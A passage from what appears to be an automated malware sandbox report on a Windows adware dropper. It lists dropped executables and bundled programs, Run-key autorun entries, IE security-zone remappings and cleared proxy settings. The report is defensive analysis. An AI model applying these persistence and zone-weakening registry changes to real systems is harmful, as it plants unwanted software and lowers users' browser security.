%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[2].js (3960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\xkna_50091167828[1].exe (627004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\setup_2948-140896[1].exe (1118776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\axuls[1].exe (52983 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\popup[1].htm (627 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[2].js (8 bytes)
%Program Files%\fjwyusp\axult.exe (53796 bytes)
%Program Files%\fjwyusp\-1303_1_td.exe (30482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\axult[1].exe (56481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\core[1].php (752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\a-zm-157391-v5[1].exe (304039 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe (181646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\IFoxInstall-y-c203945859-run-s-x[1].exe (184025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\pwc[1].htm (1048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\stat[1].gif (43 bytes)
%Program Files%\fjwyusp\xkcc_50091167828.exe (561484 bytes)
%Program Files%\fjwyusp\axuls.exe (51909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[1].js (3380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\-1303_1_td[1].exe (33209 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_ (319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\stat[1].php (5114 bytes)
%Program Files%\fjwyusp\setup_2948-140896.exe (1064854 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (251 bytes)
%Program Files%\fjwyusp\pwc.dll (1 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2340 bytes)
%Program Files%\fjwyusp\a-zm-157391-v5.exe (289171 bytes)

The Dropped deletes the following file(s):

%Program Files%\fjwyusp\pwc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\popup7o[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\s[1].js (0 bytes)

The process axuls.exe:1160 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\fjwyusp\hzsoft\htop_x.exe (293112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\htop_x[1].exe (317913 bytes)
%Program Files%\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe (151302 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\apples_5_1008[1].exe (342852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\sjss_jing_zhimeng_217[1].exe (155529 bytes)
%Program Files%\fjwyusp\hzsoft\tqrl_89_177560.exe (793877 bytes)
%Program Files%\fjwyusp\hzsoft\apples_5_1008.exe (319897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\tqrl_89_177560[1].exe (838270 bytes)

The process ignite.exe:2576 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)

The process ignite.exe:2880 makes changes in the file system.
The Dropped deletes the following file(s):

%System%\config\systemprofile\Local Settings\Temp\~DF8AF9.tmp (0 bytes)

The process ignite.exe:2764 makes changes in the file system.
The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF6CF0.tmp (0 bytes)

The process Application Dataypfbyfgmr.exe:2796 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-G9VJJ.tmp\Application Dataypfbyfgmr.tmp (6356 bytes)

The process iApple.exe:1748 makes changes in the file system.
The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe (0 bytes)

The process apples_5_1008.exe:816 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDesktopSkin.skn (8184 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\uninst.exe (1299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\mini.exe (13368 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleDCR.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Skin\AppleDefaultSkin.skn (22 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt64.dll (11048 bytes)
%Documents and Settings%\%current user%\Desktop\Æ»¹û×ÀÃæ.lnk (976 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\AppleHelper.exe (21216 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROCfg.ini (23 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Æ»¹û×ÀÃæ\Æ»¹û×ÀÃæ.lnk (992 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\AppleDTShellExt.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\focuslogo.png (5 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe (59286 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleROData.dat (6 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\bg_header1.png (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Æ»¹û×ÀÃæ\жÔØ Æ»¹û×ÀÃæ.lnk (785 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_2.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_min_1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\dshow.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe (16288 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_2.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\Helper\skin\btn_close_3.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (106535 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\Data\AppleSC.json (8 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)

The process tqrl_89_177560.exe:1644 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÐÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÐÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\tjapis[1].htm (91 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùͯ½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-СÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÆßϦ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÔÆ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-СѩתÖÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ïû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÀͶ¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýϦ.png (1 bytes)
%Documents and Settings%\%current user%\Templates\1820149\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÐÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-Сѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÍÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÐÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÐѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\tj.html (91 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÐÂÔö±¸Íü.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÔÆ.png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054Îí.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê СÓêתÖÐÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÔªÏü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ð¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (0 bytes)
%Program Files%\fjwyusp\success (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\md5dll.dll (0 bytes)

The process xkcc_50091167828.exe:2196 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Dataypfbyfgmr.exe (12288 bytes)

Registry activity

The process fm4.exe:260 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"Publisher" = "ÒôÀÖFM"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayIcon" = "%Program Files%\FM4.0\201409180317\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayName" = "ÒôÀÖFM"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"UninstallString" = "%Program Files%\FM4.0\201409180317\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D AC 69 C6 A5 50 00 1E 2F BD 41 88 68 1B 80 80"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\FM4.0]
"RD" = "_201409180317"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_201409180317" = "%Program Files%\FM4.0\201409180317\fm4.exe -mini"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_News_201409180317" = "%Program Files%\FM4.0\201409180317\fm4svr.exe -mini"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"

"AutoConfigURL"

The Dropped disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BoxNews"

"FM4.0_News"

"FM4.0"

"YyfmPlay"

The process Almanac_clnh_2014.8.3._126cl.exe:2900 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

